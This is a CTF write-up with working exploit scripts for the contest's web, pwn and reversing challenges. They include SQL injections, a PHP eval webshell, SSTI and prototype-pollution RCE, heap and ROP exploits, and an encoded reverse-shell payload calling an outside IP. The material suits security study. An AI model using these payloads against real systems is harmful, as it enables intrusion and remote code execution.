i春秋新春公益赛Writeup
2020-03-02 09:49:29 Author: xz.aliyun.com(查看原文) 阅读量:257 收藏

[TOC]

Web

zhaopin

#!coding=utf8
import requests
import re

url = "http://052f3f6dbb274376baed75f6c8c3a834f55c15f476cc45d4.changame.ichunqiu.com/"
def login(username,password):
    # Log in with the given credentials and print the greeting scraped from
    # /zhaopin.php. The call below passes a UNION-based injection string as the
    # username, which only works because the login handler concatenates `lname`
    # into its SQL unescaped; a parameterised query (or a strict format check on
    # the username) closes this.
    sess = requests.Session()
    sess.post(url+"index.php?login",data={
        "lname":username,
        "lpass":password
    })
    print(re.findall(r"欢迎你:(.*)<",sess.get(url+"/zhaopin.php").text))


login("-1' union select 1,(SELECT group_concat(flaaag) from flag),3,4,5#",123456)

easyphp

import time
import requests
flag = ""
# Time-based blind extraction, one character of `password` per outer pass: a
# guess is taken as correct when the server-side SLEEP(1) pushes the round
# trip over one second. A slow network alone can exceed that threshold and
# register a false hit; there is no confirmation request.
for p in range(1,100):
    print p
    # 90440A!7-F884
    for i in range(0x20,0x7f):
        # c = 'a'
        # H@XS
        c = chr(i)
        sql = "SELECT SLEEP(1) FROM user WHERE substr((SELECT group_concat(password) from user),{},1) = 0x{}".format(p,c.encode('hex'))
        # print sql
        # `age` is a hand-built PHP serialized string (User -> Info -> dbCtrl
        # object chain) whose `age` field carries `sql`; this only works if the
        # server unserialize()s request data. Defence: never unserialize
        # untrusted input — use JSON with a fixed schema.
        age = """";s:8:"nickname";O:4:"User":3:{s:2:"id";N;s:3:"age";s:%d:"%s";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";s:0:"";s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:7:"noob123";s:6:"dbpass";s:7:"noob123";s:8:"database";s:7:"noob123";s:4:"name";s:8:"admin222";s:8:"password";s:8:"admin222";s:6:"mysqli";N;s:5:"token";N;}}}s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:7:"noob123";s:6:"dbpass";s:7:"noob123";s:8:"database";s:7:"noob123";s:4:"name";s:8:"admin222";s:8:"password";N;s:6:"mysqli";N;s:5:"token";N;}}-----""" % (len(sql),sql)
        # NOTE(review): the repeated "union" prefix presumably targets a
        # server-side keyword filter that changes the string length and so
        # desynchronises the s:N:"..." length fields — confirm against the
        # challenge source.
        age = "union"*len(age) + age

        # print age
        url = "http://531c14aef497447dbbd6fbbe8fc04ebeef3fc54888af41e6.changame.ichunqiu.com/"
        # url = "http://127.0.0.1:2333"
        # for i in range()
        t1=time.time()
        requests.post(url+"/update.php",data={
            'age':age,
            'nickname':''
        }).content
        t2 = time.time()
        # print(t2-t1,c)
        if(t2-t1 > 1):
            flag += c
            print flag,p,c
            break
        # time.sleep(0.5)

easyupload

<?php
    // Minimal "webshell": executes whatever the `a` POST parameter contains,
    // with no authentication, so anyone who can reach the uploaded file runs
    // arbitrary PHP. Defensively: uploads must never be served from a
    // PHP-executing location, and eval() on request data is a high-signal
    // pattern for WAF/file-integrity monitoring.
    eval($_POST['a']);
    // system(xxx)

Blind_inj

import requests
import time

url = "http://7a1d4561509e492199a4debfd69beb73d9884bd1c2c54cc3.changame.ichunqiu.com/"

# Time-based blind extraction with REGEXP: the pattern is the known prefix
# (anchored with ^) plus one escaped candidate character, hex-encoded so the
# request carries no quotes; sleep(1) inside IF marks a match. The loop never
# terminates on its own — it is stopped by hand once the flag is complete.
# Defence: parameterise `id` (it is evidently interpolated raw) and treat
# response-time anomalies as a detection signal for this class of probing.
flag = "^"
while True:
    print "next"
    for i in "{}-0123456789abcdefghijklmnopqrstuvwxyz":
        # The backslash keeps regex metacharacters ({, }, -) literal.
        tmp = flag +"\\" +i
        t1=time.time()
        requests.get(url,params={
            'id':"""-1^(IF((fl4g regexp 0x{}),sleep(1),2))""".format(tmp.encode('hex'))
        }).text
        t2 = time.time()
        # print(t2-t1)
        if(t2 - t1 > 1):
            flag = tmp
            print flag
            break

easysqli_copy

import requests
import time

url = "http://53e15d2716574d48bd6493bf9ac8093eb2b755cbcb2f4855.changame.ichunqiu.com/"

# Time-based blind extraction with stacked queries: the injected statement is
# hex-encoded and run through PREPARE/EXECUTE so no SQL keyword appears in
# the request. The leading \xdf\x27 presumably relies on a multi-byte
# connection charset that swallows the escaping backslash (the "wide byte"
# case) — confirm against the challenge. Defences: utf8mb4 with a proper
# mysql_set_charset, parameterised queries, multi-statement execution off.
flag = ""
timeset = 1
for p in range(1,100):
    print p
    for i in "{}-abcdefgl0123456789":
        c = i
        t1 = time.time()
        sql = "SELECT SLEEP({}) FROM table1 WHERE substr((SELECT group_concat(fllllll4g) FROM table1),{},1) = {}".format(timeset,p,hex(ord(c)))
        requests.get(url,params={
            "id":"""\xdf\x27;set @a=0x{};prepare stmt from @a;EXECUTE stmt;""".format(sql.encode('hex'))
        })
        t2 = time.time()
        # print c,t2-t1,sql
        # A slow round trip alone can exceed timeset and register a false hit;
        # there is no confirmation request.
        if(t2 - t1 > timeset):
            flag += c
            print(flag)
            break

easysqli

import requests

url = "http://38daa8c729e64e40b32e203e62f851681dca700c0e8447e7.changame.ichunqiu.com/index.php"

# Boolean-based extraction using a whole-row comparison: the subquery row is
# compared with (1, '<guess>') and the script assumes the response contains
# "CQGAME" when that comparison is true. charlist is in ascending order, so
# the first guess that makes the row "less than" the candidate is one past
# the right character, hence charlist[i-1] is appended. (When i is 0 that
# index wraps to the last entry of charlist.)
flag = ""
charlist = "-0123456789abcdefgl{}~"
for p in range(1,100):
    print p
    for i in range(len(charlist)):
    # for i in range(0x20,0x7f):
        c = charlist[i]
        tmp = flag + c
        # print tmp
        content = requests.post(url,data={
            "id":"1 + ((select * from f1ag_1s_h3r3_hhhhh) < (select 1,'{}'))#".format(tmp)
        }).text
        if("CQGAME" in content):
            flag += charlist[i-1]
            print flag,i
            break

blackList

import requests

url = "http://13ddf249dd974c829659f1acd4723d6bfc8d0b9088974f4c.changame.ichunqiu.com/"

# The server's keyword denylist (presumably copied from the challenge source):
# preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
# HANDLER ... OPEN / READ FIRST reads a table without any of those words, so
# the filter is bypassed — denylists on SQL keywords are no substitute for
# parameterised queries (and the app must allow multi-statement execution
# for the stacked statement to run at all).
# Note: params= on a POST puts `inject` in the query string, not the body.
print(requests.post(url,params={
    "inject":"""1';handler `FlagHere` open;handler `FlagHere` read first;#"""
}).text)

ezExpress

prototype pollution

import requests

url = "http://101.200.195.106:60073"

sess = requests.Session()

# Register as "admın" (dotless i, U+0131): presumably a case-mapping collision
# so that an upper-casing comparison treats it as "admin" while the stored
# name stays distinct — confirm against the challenge source.
sess.post(url + "/login",json={
    "Submit":"register",
    "userid":"admın",
    "pwd":"123"
}).text


# Prototype pollution through a recursive merge of the JSON body: keys under
# __proto__ land on Object.prototype, where the template engine (presumably
# EJS, given these option names) later reads compileDebug/self/
# outputFunctionName and splices outputFunctionName into generated code.
# Defence: reject "__proto__"/"constructor"/"prototype" keys in any
# merge/assign helper, or Object.freeze(Object.prototype) at startup.
data = {
    "__proto__":{
        "compileDebug":1,
        "self":1,
        "outputFunctionName":"a;global.process.mainModule.require('child_process').execSync('***');//"
    }
}


print(sess.post(url+'/action',json=data).text)

print(sess.get(url+'/info').text)

flaskapp

# coding:utf-8

import requests, re, time
from urllib import *
from HTMLParser import HTMLParser
h = HTMLParser()
sess = requests.Session()

# Python expression handed to eval on the server once the template escape
# below reaches the builtins.
payload = '''__import__("os").popen("cat /this_is_the_flag.txt").read()'''

# Re-spell the payload as 'c'+'h'+'a'+'r' concatenation, presumably to get
# past a filter on quoted strings or keywords — confirm against the challenge.
ss = ''
for p in payload:
    ss += "'"+p+"'+"

ss = ss[:-1]

# Jinja2 SSTI: walk from '' to object.__subclasses__()[134] (an index specific
# to the server's Python build) and reach eval through that class's globals.
# Defence: never render user-supplied text as a template; pass it to
# render_template as a variable so it is only ever a value.
test = '''{{{{''.__class__.__base__.__subclasses__()[134].__init__.__globals__['__builtins__']['ev'+'al']({})}}}}'''.format(ss)

print test
data = {
    # Session-bound CSRF token copied from the author's browser session.
    'csrf_token': 'ImFlMDBkMDA5OTQxM2UwODA0ZTY1NjUxZjYxNTliNDVjMGJhODcyNDYi.XlH51w.rs5sHa4a7JzVM0JSaWeWBLUFyZ0',
    # base64, presumably because the /decode endpoint decodes its input
    # before rendering it.
    'text': test.encode('base64').strip(),
    'submit': '提交'
}

kk = sess.post('http://182.92.243.154:10002/decode',data=data).content
start = kk.find('结果 :')
kk = kk[start+10:]

end = kk.find('</div>')
kk = kk[:end]

print(h.unescape(kk))

easy_thinking

  1. thinkphp6.0 Session RCE
  2. php GC管理 RCE

node_game

HTTP 协议注入,pug模版注入,考虑使用Orange17年blackhat演讲

#!coding=utf8
import requests
import urllib


def gen(st):
    """Lift every character of ``st`` into the U+FF00 block.

    Each character ``ch`` becomes ``chr(0xFF00 + ord(ch))``. A component that
    later narrows such code points to one byte by dropping the high byte gets
    the original byte back, which is why header values must be validated as
    printable ASCII before they reach an HTTP encoder.
    """
    return "".join(chr(0xFF00 + ord(ch)) for ch in st)

def genpayload(payload):
    """Return ``payload`` as a run of backslash-octal escapes (``a`` -> ``\\141``).

    ``oct()`` yields ``0o141``; the two-character prefix is stripped, so the
    escape has no leading zero padding.
    """
    return "".join("\\" + oct(ord(ch))[2:] for ch in payload)

payload = """ HTTP/1.1
Host: 127.0.0.1:8081
Connection: keep-alive



POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------785936127467730273918326
User-Agent: PostmanRuntime/7.22.0
Accept: */*
Cache-Control: no-cache
Postman-Token: 7722e258-0abf-40b7-8a6d-5c2e697c0966
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Content-Length: 1000
Connection: close

----------------------------785936127467730273918326
Content-Disposition: form-data; name="file"; filename="sndav.pug"
Content-Type: ../template

- [][$='\\143\\157\\156\\163\\164\\162\\165\\143\\164\\157\\162'][$]('\\147\\154\\157\\142\\141\\154\\56\\160\\162\\157\\143\\145\\163\\163\\56\\155\\141\\151\\156\\115\\157\\144\\165\\154\\145\\56\\162\\145\\161\\165\\151\\162\\145\\50\\47\\143\\150\\151\\154\\144\\137\\160\\162\\157\\143\\145\\163\\163\\47\\51\\56\\145\\170\\145\\143\\123\\171\\156\\143\\50\\47\\142\\141\\163\\150\\40\\55\\143\\40\\42\\142\\141\\163\\150\\40\\55\\151\\40\\76\\46\\40\\57\\144\\145\\166\\57\\164\\143\\160\\57\\61\\62\\62\\56\\61\\65\\62\\56\\62\\63\\60\\56\\61\\66\\60\\57\\62\\63\\63\\63\\40\\60\\76\\46\\61\\42\\47\\51')()

----------------------------785936127467730273918326--


"""

payload2 = ""
# HTTP line endings have to be CRLF for the smuggled request to parse.
payload = payload.replace('\n','\r\n')
# Same transform as gen(): every byte is lifted into the U+FF00 block. Some
# server-side component later narrows these code points to single bytes,
# restoring the raw CR/LF and header bytes — the Unicode-to-byte truncation
# issue from the BlackHat talk cited above; which library does the narrowing
# here is not shown. Defence: validate anything placed into a request line or
# header as printable ASCII before encoding it.
for i in payload:
    payload2 += chr(0xFF00 + ord(i))


# url = "http://localhost:8081"
url = "http://182.92.243.154:33321"
# print urllib.quote(payload) 
print(requests.get(url+"/core",params={
    'q':payload2
}).text)

print("====")
# print(requests.get(url+"/?action=sndav").text)

Pwn

BFnote

栈迁移+ret2dl

#coding:utf-8
from pwn import *
from roputils import *

path = './BFnote'
local = 1
attach = 0
P = ELF(path)
elf = ELF(path)
context(os='linux',arch='i386',terminal=['tmux','split','-h'])
context.log_level = 'debug'

# Stack pivot + ret2dlresolve on a 32-bit binary (see the note above the
# listing). Every table address below is hard-coded, so PIE alone would break
# this script, and a stack canary would presumably stop the initial overflow.
# Python 2 script (print statements; `/` is integer division).
if local == 1:
    p = process(path)
    if context.arch == 'amd64':
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p = remote()  # placeholder: host and port were never filled in


rop = ROP(path)                        #ROP inherits from ELF; section/got/plt below are the parent class's methods
bss_addr = rop.section('.bss')+0x800
read_got = rop.got('read')
read_plt = rop.plt('read')

#gdb.attach(p,'b *0x08048973')
p.recvuntil('Give your description : ')
# Overflow of the description buffer; the last dword presumably overwrites a
# global at 0x0804A060+4 that later input is written through (binary not shown).
payload = '\x11'*0x32+'\x11'*4+'\x00'*4+p32(0x0804A060+4)
p.send(payload)
p.recvuntil('Give your postscript : ')

# Pivot chain: read(0, bss_addr-0x14, 0x400), then gadgets at 0x080489db and
# 0x08048578 (addresses in the binary, not shown here) move execution into .bss.
buf = rop.call(read_plt, 0, bss_addr-0x14, 0x400)        #call builds a call through a function's PLT address
buf += p32(0x080489db)
buf += p32(bss_addr-0x14)
buf += p32(0x08048578)


p.send(buf)

p.recvuntil('Give your notebook size : ')
p.send(str(0x20000))
p.recvuntil('Give your title size : ')
# Size derived from two addresses observed in the author's debugger session;
# it is specific to that environment.
p.send(str(0xf7dcb714-0xf7daa008-0x10))
p.recvuntil('please re-enter :\n')
p.send(str(0x10))
p.recvuntil('Give your title : ')
p.send('\x33'*0x10)
p.recvuntil('Give your note : ')
p.send('\x11'*4)

#
# Fixed addresses of the dynamic-linking tables (non-PIE binary).
plt0 = 0x8048450
rel_plt = 0x80483d0
dynsym = 0x80481d8
dynstr = 0x80482c8

print "plt0: "+hex(plt0)
print "rel_plt: "+hex(rel_plt)
print "dynsym: "+hex(dynsym)
print "dynstr: "+hex(dynstr)

raw_input()
libc_start_main = 0x0804a024
#0x14
# Fake resolver frame, read into bss_addr-0x14: return into plt0 with
# relocation offset 0x2498, which is laid out to land on the fake Elf32_Rel
# below; "/bin/sh" sits at bss_addr (the argument) and "system" at bss_addr+0x20.
payload = p32(0)+p32(plt0)+p32(0x2498)+p32(0)+p32(bss_addr)
print hex(len(payload))
payload += "/bin/sh".ljust(0x20,'\x00')
payload += 'system\x00\x00'
# r_info = (symbol index << 8) | R_386_JUMP_SLOT (7); the index is measured from .dynsym.
fake_r_info = (((((bss_addr+0x30+8) - dynsym) / 0x10) << 8) | 0x07)
fake_rel = p32(libc_start_main)+p32(fake_r_info)
payload += fake_rel
payload += '\x00'*8
fake_str_off = (bss_addr+0x20) - dynstr
# Elf32_Sym: st_name offset into .dynstr, st_value/st_size 0, st_info 0x12 (GLOBAL|FUNC).
fake_sym = p32(fake_str_off)+p32(0)*2+chr(0x12)+chr(0)+p16(0)
payload += fake_sym
p.send(payload)
p.interactive()

interested

%a泄露libc,UAF get shell

#coding=utf-8
from pwn import *

# pwntools shorthands; none of them is called in this script.
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./interested')
libc_offset = 0x3c4b20
# one_gadget offsets for the libc the remote service runs; not derived here.
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:

    p = process('./interested')

else:
    p = remote('123.56.85.29',3041)

# Menu wrappers; each drives one option of the target's text menu.
def Add(sz1,sz2,content1='1',content2='2'):
    # option 1: allocate an "Oreo" with two buffers of sizes sz1 and sz2
    p.sendlineafter("> Now please tell me what you want to do :","1")
    p.recvuntil("> O's length : ")
    p.sendline(str(sz1))
    p.recvuntil("> O : ")
    p.send(content1)
    p.recvuntil("> RE's length : ")
    p.sendline(str(sz2))
    p.recvuntil("> RE : ")
    p.send(content2)

def Mod(idx,content1,content2):
    # option 2: overwrite both buffers of Oreo idx (no liveness check on the target side)
    p.sendlineafter("> Now please tell me what you want to do :","2")
    p.sendlineafter("> Oreo ID : ",str(idx))
    p.sendafter("> O : ",content1)
    p.sendafter("> RE : ",content2)

def View(idx):
    # option 4: print Oreo idx (unused below)
    p.sendlineafter("> Now please tell me what you want to do :","4")
    p.sendlineafter("> Oreo ID : ",str(idx))

def Delete(idx):
    # option 3: free Oreo idx
    p.sendlineafter("> Now please tell me what you want to do :","3")
    p.sendlineafter("> Oreo ID : ",str(idx))

def Check():
    # option 0: echo the "code" entered at start-up
    p.sendlineafter("> Now please tell me what you want to do :","0")


def exp():
    #leak libc
    # The "code" string is reflected through a printf-style formatter, so the
    # "%a" conversions dump stack words as hex floats; one of them carries a
    # libc pointer that the parse below pulls out of the mantissa. Defence:
    # user text must be a printf argument, never the format string.
    payload = "OreOOrereOOreO"
    #%3ok->libc?
    #%6ok->text
    payload += "%a%a"
    p.recvuntil("Input your code please:")
    p.send(payload)

    Check()
    p.recvuntil("Your Code is OreOOrereOOreO0x0.0")
    data = p.recvuntil("p-",drop=True)
    # Leaked-pointer minus libc-base as seen in the author's debugger; valid
    # only for that libc build.
    libc_base = int(data,16) - (0x7f426c81d6a3-0x7f426c458000)
    log.success("libc base => " + hex(libc_base))
    #UAF get shell
    # Mod(1, ...) writes into Oreo 1 after Delete(1) freed it — the record
    # pointer is never cleared. The write points the freed 0x60 chunk's fd at
    # __malloc_hook-0x23 (presumably where a 0x7f byte passes the fastbin size
    # check), so the second Add hands out memory overlapping the hook and a
    # one_gadget address is written there; the double Delete(2) then
    # presumably reaches malloc through glibc's error path. Defence: NULL the
    # pointer on free and validate idx; glibc 2.32+ safe-linking and the
    # removal of __malloc_hook in 2.34 also break this path.
    Add(0x20,0x60)#1
    Add(0x20,0x60)#2
    Delete(1)
    Mod(1,p64(0),p64(libc_base+libc.sym['__malloc_hook']-0x23))
    Add(0x20,0x60)
    shell_addr = libc_base + gadgets[2]
    #gdb.attach(p)
    Add(0x20,0x60,'a','\x00'*0x13+p64(shell_addr))
    Delete(2)
    Delete(2)

    p.interactive()

exp()

borrow_stack

基础栈迁移

#coding=utf-8
from pwn import *

# pwntools shorthands; none of them is called in this script.
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./borrowstack')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:

    p = process('./borrowstack')

else:
    p = remote('123.56.85.29',3635)

# Fixed addresses (non-PIE binary): `bank` is a writable buffer the stack is
# pivoted into; csu_start/csu_end are the two halves of the __libc_csu_init
# gadget. Stack canary + PIE are the mitigations that matter for this pattern.
bank = 0x601080
leave_ret = 0x0000000000400699
read_plt = elf.plt['read']
read_got = elf.got['read']
csu_start = 0x4006fa
csu_end = 0x4006e0
puts_got = elf.got['__libc_start_main']  # the entry leaked, despite the name
puts_plt = elf.plt['puts']
p_rdi = 0x0000000000400703
p_rsi_r15 = 0x0000000000400701

def csu(rbx,rbp,r12,r13,r14,r15,retn_addr,rbp2):
    # One ret2csu chain: pop six registers at csu_start, fall into csu_end
    # (call [r12] with edi=r15, rsi=r14, rdx=r13 per the notes below), then
    # 0x38 bytes of padding for the epilogue's add/six pops — rbp2 lands in
    # rbp — and finally return to retn_addr.
    #rbx=0
    #rbp=1
    #r15=edi
    #r14=rsi
    #r13=rdx
    #r12=target
    payload = p64(csu_start)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload += p64(csu_end)
    payload += 'a'*0x10+p64(rbp2)+'a'*0x20
    payload += p64(retn_addr)
    return payload


def exp():
    #leak libc
    #gdb.attach(p,'b* 0x4006e0')
    p.recvuntil("Welcome to Stack bank,Tell me what you want")
    # 0x60 bytes of filler, then saved rbp := bank and return := leave;ret, so
    # the frame is moved into `bank`; later reads stage more chain there.
    payload = 'a'*0x60+p64(bank)+p64(leave_ret)
    p.send(payload)
    p.recvuntil("Done!You can check and use your borrow stack now!")
    #payload = p64(bank+0x200)+p64(p_rdi)+p64(puts_got)+p64(elf.plt['puts'])
    # read(0, bank+0x400, 0x400) then pivot to bank+0x400; "/bin/sh" stays at bank.
    payload = "/bin/sh\x00"+csu(0,1,read_got,0x400,bank+0x400,0,leave_ret,bank+0x400)
    p.send(payload)
    raw_input()
    # puts(__libc_start_main@got) leaks libc, then read the final chain at bank+0x500.
    payload = p64(bank+0x500)+p64(p_rdi)+p64(puts_got)+p64(puts_plt)
    payload += csu(0,1,read_got,0x200,bank+0x500,0,leave_ret,bank+0x500)
    p.send(payload)
    p.recvline()
    libc_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - libc.sym['__libc_start_main']
    log.success("libc base => " + hex(libc_base))
    #
    # system's address is written at bank+0x500 and called through [r12] with rdi = bank.
    payload = p64(libc_base+libc.sym['system'])+csu(0,1,bank+0x500,0,0,bank,leave_ret,bank)
    raw_input()
    p.send(payload)
    p.interactive()

exp()

excited

fbatk读flag

#coding:utf-8

from pwn import *

path = './excited'
local = 0
attach = 0
#P = ELF(path)
context(os='linux',arch='amd64',terminal=['terminator','-x','sh','-c'])
context.log_level = 'debug'

if local == 1:
    p = process(path)
    if context.arch == 'amd64':
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p = remote('123.56.85.29',6484)


# Menu wrappers (option numbers from the target's prompt).
def new(size1,content1,size2,content2):
    # option 1: allocate a record with two buffers ("ba" and "na")
    p.recvuntil('> Now please tell me what you want to do :')
    p.sendline('1')
    p.recvuntil('length : ')
    p.sendline(str(size1))
    p.recvuntil('> ba : ')
    p.send(content1)
    p.recvuntil('length : ')
    p.sendline(str(size2))
    p.recvuntil('> na : ')
    p.send(content2)

def delete(idx):
    # option 3: free record idx (the target does not reject a repeated idx, see below)
    p.recvuntil(' Now please tell me what you want to do :')
    p.sendline('3')
    p.recvuntil(' ID : ')
    p.sendline(str(idx))

def show(idx):
    # option 4: print record idx
    p.recvuntil('ow please tell me what you want to do :')
    p.sendline('4')
    p.recvuntil('ID : ')
    p.sendline(str(idx))

# Fastbin double free: delete(0) twice with delete(1) in between, the ordering
# that gets past glibc's "fasttop" check (it only compares with the bin head).
# The duplicated chunk is re-allocated with its fd set to 0x602098, presumably
# a pointer slot in the binary's data (the write-up's "fbatk"), so a later
# record's buffer pointer lands there and show(6) prints what it references.
# Defence: clear the record pointer on free and refuse a second free of it.
new(0x20,'\x00',0x50,'\x00')
new(0x20,'\x11',0x50,'\x11')
new(0x10,'\x22',0x10,'\x22')
delete(0)
delete(1)
delete(0)
delete(2)

new(0x20,'\x22',0x50,p64(0x602098))
new(0x30,'\x33',0x50,'\x00')
new(0x40,'\x44',0x50,'\x00')
new(0x60,'\x55',0x50,'\x55') #6
show(6)
p.recvuntil('U')
p.recvuntil('U')
flag = p.recvuntil('\n')
log.success('flag = f'+flag)

if attach == 1:
    gdb.attach(p)
p.interactive()

Drangon

爆破攻击力,杀死龙,fbatk

#coding:utf-8

from pwn import *

path = './pwn'
local = 1
attach = 0
#P = ELF(path)
context(os='linux',arch='amd64',terminal=['terminator','-x','sh','-c'])
context.log_level = 'debug'

if local == 1:
    p = process(path)
    if context.arch == 'amd64':
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        libc = ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p = remote('123.56.85.29',4978)

def give_up(len,name):
    # options 1 -> 3: set a name of the given length (`len` shadows the builtin).
    p.recvuntil('choose:')
    p.sendline('1')
    p.recvuntil('choose:')
    p.sendline('3')
    p.recvuntil('length:')
    p.sendline(str(len))
    p.recvuntil('name:')
    p.send(name)

# Game phase: 24 rounds of options 1/6/5 — per the note above the listing this
# grinds the attack stat until the dragon can be killed; the exact menu
# semantics are not shown here.
p.recvuntil('choose:')
p.sendline('1')

for i in range(24):
    p.recvuntil('choose:')
    p.sendline('1')
    p.recvuntil('7. Give up')
    p.sendline('6')
    p.recvuntil('7. Give up')
    p.sendline('5')

p.recvuntil('choose:')
p.sendline('2')
p.recvuntil('Give up')
p.sendline('2')

# A 0x90-byte name presumably comes back from the unsorted bin, so the bytes
# read back contain a main_arena pointer; the constant is that pointer minus
# libc base as seen in the author's debug session.
p.recvuntil('how long your name:')
p.sendline(str(0x90))
sleep(1)
p.send('\x11'*0x90)

p.recvuntil('choose:')
p.sendline('3')

p.recvuntil('name : ')
libcbase = u64(p.recv(6).ljust(8,'\x00')) - (0x7ffff7839b78-0x00007ffff7475000)
log.success('libcbase = '+hex(libcbase))

# Fastbin dup on the 0x70 size class: two 0x60 names, then options 5/4
# (presumably the frees), then the freed chunk's fd is pointed at
# __malloc_hook-0x23 so the fourth allocation overlaps the hooks.
give_up(0x60,'\x11'*0x60)
give_up(0x60,'\x22'*0x60)

p.recvuntil('choose:')
p.sendline('5')
p.recvuntil('choose:')
p.sendline('4')

give_up(0x60,p64(libcbase+libc.sym['__malloc_hook']-0x23))
give_up(0x60,'\x00')
give_up(0x60,'\x00')
one_gadget = [0x4526a,0x45216,0xf02a4,0xf1147]
# 0xb bytes of padding put the first qword on __realloc_hook and the second on
# __malloc_hook (realloc+2 re-aligns the stack for the gadget's constraint).
payload = '\x00'*0xb + p64(libcbase+one_gadget[0]) + p64(libcbase+libc.sym['__libc_realloc']+2)
give_up(0x60,payload)

p.interactive()

signin

利用tcache不满时,fastbin中多余的chunk会放入tcache的操作,让ptr作为fake_chunk,向其fd写入一个heap地址后调用后门

#coding=utf-8
from pwn import *

# pwntools shorthands; none of them is called in this script.
r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./pwn')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]  # unused here
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if debug:
    p = process('./pwn')

else:
    p = remote('123.56.85.29',4205)

# Menu wrappers; each drives one option of the target's text menu.
def Add(idx):
    # option 1: allocate slot idx (size is fixed by the target)
    p.recvuntil('your choice?')
    p.sendline('1')
    p.recvuntil("idx?")
    p.sendline(str(idx))

def Edit(idx,content):
    # option 2: write content into slot idx — works after Delete too, which is the bug
    p.recvuntil('your choice?')
    p.sendline('2')
    p.recvuntil("idx?")
    p.sendline(str(idx))
    sleep(0.02)
    p.send(content)

def Delete(idx):
    # option 3: free slot idx
    p.recvuntil('your choice?')
    p.sendline('3')
    p.recvuntil("idx?")
    p.sendline(str(idx))

def Backdoor():
    # option 6: the challenge's built-in win function
    p.recvuntil('your choice?')
    p.sendline('6')


def exp():
    target = 0x4040c0
    ptr_lis = 0x4040e0  # unused
    # Nine same-size allocations then nine frees: tcache takes the first
    # seven, the last two go to the fastbin (see the note above the listing).
    # Edit(8, ...) rewrites the fd of freed fastbin chunk 8 to target-0x10; on
    # Add(10) glibc refills the tcache from the fastbin, which writes a heap
    # pointer into the fake chunk's fd — i.e. into `target` — and Backdoor()
    # presumably acts on what is stored there. Defence: drop the slot pointer
    # on free so Edit cannot touch freed memory.
    for i in range(9):
        Add(str(i))
    for i in range(9):
        Delete(str(i))
    Edit(8,p64(target-0x10))
    Add(10)
    #gdb.attach(p)
    Backdoor()
    p.interactive()

exp()

Re

奇怪的安装包

String搜索,发现有Nullsoft字样,去百度发现是NSIS,专门用来写安装包程序的脚本语言
百度发现7z可以直接解出nsi脚本,发现就是每个字符异或1之后比较。
EXP:

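# Recover the flag from the NSIS script's check: every stored byte is the
# flag byte XOR 1, so XOR-ing with 1 again restores it. (The write-up's
# sketch applied ^ to the whole string, which Python rejects.)
Str = "gm`fzd787`7bb,g72d,592b,8`g1,cg96813e8d``|"
Flag = "".join(chr(ord(ch) ^ 1) for ch in Str)
print(Flag)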

吃鸡神器

ida打开,字符串定位找到错误函数,一路回溯到判断函数,
发现核心代码就是将用户名进行一波处理生成一个DWORD,再将输入的密码字符串转化为hex的DWORD进行比较
所以直接输入lubenwei用户名下断点判断即可
这个dword是0x41d26f00
所以flag就是flag{41d26f00}

EasyVM

从名字知道是个虚拟机,定位到operate函数,然后搞清楚opcode格式
写个EXP分析下opcode,然后开始直接看翻译过的代码

#include<cstdio>
#include<cstdlib>
using namespace std;
//flag{vm_is_not_easy}
unsigned int opcode[1000]={opcodes here..};

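/*
 * Render one VM operand as text for the disassembly listing.
 *
 * Operand encoding as observed in the EasyVM challenge: values >= 200 appear
 * to be immediates and are printed as num(v+56) (the same transformation the
 * original listing used, truncated to char), 101 and 102 are the two
 * registers, anything else is an index into the VM's array.
 *
 * Returns a heap string the caller owns (free() it), or NULL if malloc fails.
 * snprintf replaces sprintf so an unexpected value can never overrun the
 * 20-byte buffer ("arr[" + 11 digits + "]" is the longest case).
 */
char *parseNum(int num)
{
    const size_t cap = 20;
    char *str = (char*)malloc(cap);
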